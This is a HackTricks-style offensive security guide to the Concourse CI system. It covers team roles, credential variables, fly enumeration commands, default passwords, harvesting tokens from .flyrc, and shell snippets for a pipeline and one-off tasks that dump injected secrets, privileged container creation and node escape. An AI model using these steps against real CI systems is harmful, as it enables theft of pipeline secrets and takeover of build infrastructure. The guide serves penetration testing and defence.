Concourse Enumeration & Attacks
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Concourse comes with five roles:
Concourse Admin: This role is only given to owners of the main team (the default initial Concourse team). Admins can configure other teams (e.g.: fly set-team, fly destroy-team...). The permissions of this role cannot be affected by RBAC.
owner: Team owners can modify everything within the team.
member: Team members can read and write within the teams assets but cannot modify the team settings.
pipeline-operator: Pipeline operators can perform pipeline operations such as triggering builds and pinning resources, however they cannot update pipeline configurations.
viewer: Team viewers have "read-only" access to a team and its pipelines.
Moreover, the permissions of the roles owner, member, pipeline-operator and viewer can be modified by configuring RBAC (more specifically, by configuring its actions). Read more about it in: https://concourse-ci.org/user-roles.html
Note that Concourse groups pipelines inside Teams. Therefore users belonging to a Team can manage those pipelines, and several Teams may exist. A user can belong to several Teams and have different permissions inside each of them.
In the YAML configs you can reference values using the syntax ((_source-name_:_secret-path_._secret-field_)).
From the docs: The source-name is optional, and if omitted, the cluster-wide credential manager will be used, or the value may be provided statically.
The optional _secret-field_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.
Moreover, the secret-path and secret-field may be surrounded by double quotes "..." if they contain special characters like . and :. For instance, ((source:"my.secret"."field:1")) will set the secret-path to my.secret and the secret-field to field:1.
Static vars can be specified in tasks steps:
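For instance, a minimal sketch of a task step declaring a static var inline (the task name, var name and image are made up; the var is referenced with the usual ((...)) syntax):

```shell
# Write a pipeline snippet whose task step carries its own static var.
cat > /tmp/static-vars.yml <<'EOF'
plan:
- task: print-greeting
  config:
    platform: linux
    image_resource:
      type: registry-image
      source: {repository: busybox}
    run:
      path: echo
      args: ["((greeting))"]
  vars:
    greeting: "hello from a static var"
EOF
grep -c '((greeting))' /tmp/static-vars.yml   # the var is referenced once
```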
Or using the following fly arguments:
- -v or --var NAME=VALUE sets the string VALUE as the value for the var NAME.
- -y or --yaml-var NAME=VALUE parses VALUE as YAML and sets it as the value for the var NAME.
- -i or --instance-var NAME=VALUE parses VALUE as YAML and sets it as the value for the instance var NAME. See Grouping Pipelines to learn more about instance vars.
- -l or --load-vars-from FILE loads FILE, a YAML document mapping var names to values, and sets them all.
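A quick sketch of a vars file consumed with -l / --load-vars-from (the file path, var names and pipeline name are made up; the fly call is commented out since it needs a live target):

```shell
# Create a YAML vars file mapping var names to values.
cat > /tmp/vars.yml <<'EOF'
image: busybox
tag: "1.36"
EOF
# Consume it (plus an extra -v string var) when setting a pipeline:
# fly -t example set-pipeline -p demo -c pipeline.yml -l /tmp/vars.yml -v branch=main
grep -c ':' /tmp/vars.yml   # both var mappings are present
```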
There are different ways a Credential Manager can be specified in a pipeline, read how in https://concourse-ci.org/creds.html. Moreover, Concourse supports different credential managers:
Note that if you have some kind of write access to Concourse you can create jobs to exfiltrate those secrets as Concourse needs to be able to access them.
In order to enumerate a Concourse environment you first need to gather valid credentials or find an authenticated token, probably in a .flyrc config file.
To login you need to know the endpoint, the team name (default is main) and a team the user belongs to:
fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]
Get configured targets:
fly targets
Get if the configured target connection is still valid:
fly -t <target> status
Get role of the user against the indicated target:
fly -t <target> userinfo
Note that the API token is saved in $HOME/.flyrc by default; when looting a machine you could find the credentials there.
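For instance, a sketch of pulling tokens out of a looted .flyrc (the sample content below mirrors the file's YAML layout; real target names and token values will differ):

```shell
# Sample .flyrc standing in for a looted $HOME/.flyrc.
cat > /tmp/flyrc <<'EOF'
targets:
  example:
    api: https://ci.example.com
    team: main
    token:
      type: bearer
      value: eyJhbGciOi...SNIP
EOF
# The file is plain YAML, so grep/awk are enough to harvest the bearer tokens:
grep -A2 'token:' /tmp/flyrc | awk '/value:/ {print $2}'
```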
Get a list of the Teams
fly -t <target> teams
Get roles inside team
fly -t <target> get-team -n <team-name>
Get a list of users
fly -t <target> active-users
List pipelines:
fly -t <target> pipelines -a
Get pipeline yaml (sensitive information might be found in the definition):
fly -t <target> get-pipeline -p <pipeline-name>
Get all pipeline config declared vars
for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done
Get all the pipelines secret names used (if you can create/modify a job or hijack a container you could exfiltrate them):
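A sketch of pulling every ((...)) secret reference out of a dumped pipeline definition (the sample file stands in for fly get-pipeline output; the commented loop runs the same grep across all pipelines of a live target, assuming the first line of fly pipelines is a header):

```shell
# Sample pipeline definition with two secret references.
cat > /tmp/pipe.yml <<'EOF'
resources:
- name: repo
  source:
    private_key: ((github_ssh_key))
    password: ((vault:ci/creds.password))
EOF
grep -oE '\(\([^)]+\)\)' /tmp/pipe.yml | sort -u
# Across every pipeline of a live target:
# for p in $(fly -t example pipelines | awk 'NR>1 {print $2}'); do
#   fly -t example get-pipeline -p "$p" | grep -oE '\(\([^)]+\)\)'
# done | sort -u
```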
List workers:
fly -t <target> workers
List containers:
fly -t <target> containers
List builds (to see what is running):
fly -t <target> builds
Default/test credentials worth trying:
admin:admin
test:test
In the previous section we saw how you can get all the secrets names and vars used by the pipeline. The vars might contain sensitive info and the name of the secrets will be useful later to try to steal them.
If you have enough privileges (member role or more) you will be able to list pipelines and roles, and get a session inside the <pipeline>/<job> container using:
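A sketch of the command (target, pipeline and job names are placeholders you must swap for what you enumerated; fly intercept is also aliased as fly hijack and attaches a shell to a build's container):

```shell
# Placeholder names from earlier enumeration; adjust to your environment.
target=example; pipeline=mypipe; job=build
# Build the intercept command and print it; run the printed line on a live target.
cmd="fly -t $target intercept -j $pipeline/$job -- /bin/sh"
echo "$cmd"
```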
With these permissions you might be able to:
Steal the secrets inside the container
Try to escape to the node
Enumerate/Abuse cloud metadata endpoint (from the pod and from the node, if possible)
If you have enough privileges (member role or more) you will be able to create/modify new pipelines. Check this example:
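A sketch of such a pipeline (the secret name ((aws_secret)), the target and the pipeline name are placeholders; the fly calls are commented out since they need a live target):

```shell
# Pipeline whose only job dumps its environment, leaking the injected secret.
cat > /tmp/evil-pipeline.yml <<'EOF'
jobs:
- name: exfil
  plan:
  - task: dump
    privileged: true   # also opens the door to node-escape attempts
    config:
      platform: linux
      image_resource:
        type: registry-image
        source: {repository: busybox}
      params:
        STOLEN: ((aws_secret))   # a secret name learned during enumeration
      run:
        path: sh
        args: ["-c", "env"]      # the secret lands in the build log
EOF
# fly -t example set-pipeline -p evil -c /tmp/evil-pipeline.yml
# fly -t example unpause-pipeline -p evil
# fly -t example trigger-job -j evil/exfil --watch
grep -c 'aws_secret' /tmp/evil-pipeline.yml   # secret is referenced once
```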
With the modification/creation of a new pipeline you will be able to:
- Steal the secrets (by echoing them out or by getting inside the container and running env)
- Escape to the node (by giving yourself enough privileges: privileged: true)
- Enumerate/abuse the cloud metadata endpoint (from the pod and from the node)
- Delete the created pipeline
This is similar to the previous method, but instead of modifying/creating a whole new pipeline you can just execute a custom task (which will probably be much stealthier):
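A sketch of a one-off task (the secret name ((db_password)) and the target are placeholders; the fly execute call is commented out since it needs a live target, and the --privileged flag is the fly execute option I believe matches the privileged task setting, so verify it against your fly version):

```shell
# Stand-alone task definition that dumps its environment and identity.
cat > /tmp/task.yml <<'EOF'
platform: linux
image_resource:
  type: registry-image
  source: {repository: busybox}
params:
  SECRET: ((db_password))   # any secret name you enumerated
run:
  path: sh
  args: ["-c", "env; id"]
EOF
# fly -t example execute --privileged -c /tmp/task.yml
grep -c 'db_password' /tmp/task.yml   # secret is referenced once
```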
In the previous sections we saw how to execute a privileged task with Concourse. This won't give the container exactly the same access as the privileged flag in a Docker container. For example, you won't see the node's filesystem device in /dev, so the escape could be more "complex".
In the following PoC we are going to use the release_agent to escape with some small modifications:
As you might have noticed, this is just a regular release_agent escape with the path of the cmd in the node modified.
A regular release_agent escape with a minor modification is enough for this:
Even if the web container has some defenses disabled, it's not running as a common privileged container (for example, you cannot mount and the capabilities are very limited), so all the easy ways to escape from the container are useless.
However, it stores local credentials in clear text:
You could use those credentials to log in to the web server, create a privileged container and escape to the node.
In the environment you can also find information to access the PostgreSQL instance that Concourse uses (address, username, password and database, among other info):
These are just some interesting notes about the service, but because it's only listening on localhost, these notes won't enable any impact we haven't already exploited before.
By default each Concourse worker runs a Garden service on port 7777. This service is used by the Web master to tell the worker what it needs to execute (download the image and run each task). This sounds pretty good for an attacker, but there are some nice protections:
It's only exposed locally (127.0.0.1) and, apparently, when the worker authenticates against the Web via the special SSH service, a tunnel is created so the web server can talk to each Garden service inside each worker.
The web server is monitoring the running containers every few seconds, and unexpected containers are deleted. So if you want to run a custom container you need to tamper with the communication between the web server and the garden service.
Concourse workers run with high container privileges:
However, techniques like mounting the /dev device of the node or using release_agent won't work (the real device with the filesystem of the node isn't accessible, only a virtual one). We cannot access the processes of the node, so escaping to the node without kernel exploits gets complicated.
In the previous section we saw how to escape from a privileged container, so if we can execute commands in a privileged container created by the current worker, we could escape to the node.
Note that while playing with Concourse I noticed that when a new container is spawned to run something, the container's processes are accessible from the worker container, so it's like a container creating a new container inside of it.
Getting inside a running privileged container
Creating a new privileged container
You can very easily create a new container (just use a random UID) and execute something in it:
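A sketch against the worker-local Garden API (default 127.0.0.1:7777). The endpoint shapes below follow the Garden server routes as I understand them; treat the exact JSON fields and the raw:// rootfs path as assumptions to verify against your version, and run the curls from inside the worker (or through the tunnel):

```shell
# Base URL of the Garden service running on the worker.
GARDEN=http://127.0.0.1:7777
# List handles of running containers:
# curl "$GARDEN/containers"
# Create a privileged container with an arbitrary handle (the rootfs is a
# placeholder volume path under /concourse-work-dir/volumes/live/):
# curl -X POST "$GARDEN/containers" -H 'Content-Type: application/json' \
#      -d '{"handle":"some-random-uid","privileged":true,
#           "rootfs":"raw:///concourse-work-dir/volumes/live/<volume-id>/volume"}'
echo "$GARDEN/containers"   # the listing endpoint you would hit first
```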
However, the web server checks every few seconds which containers are running, and unexpected ones are deleted. As the communication occurs over HTTP, you could tamper with it to avoid the deletion of unexpected containers:
https://concourse-ci.org/vars.html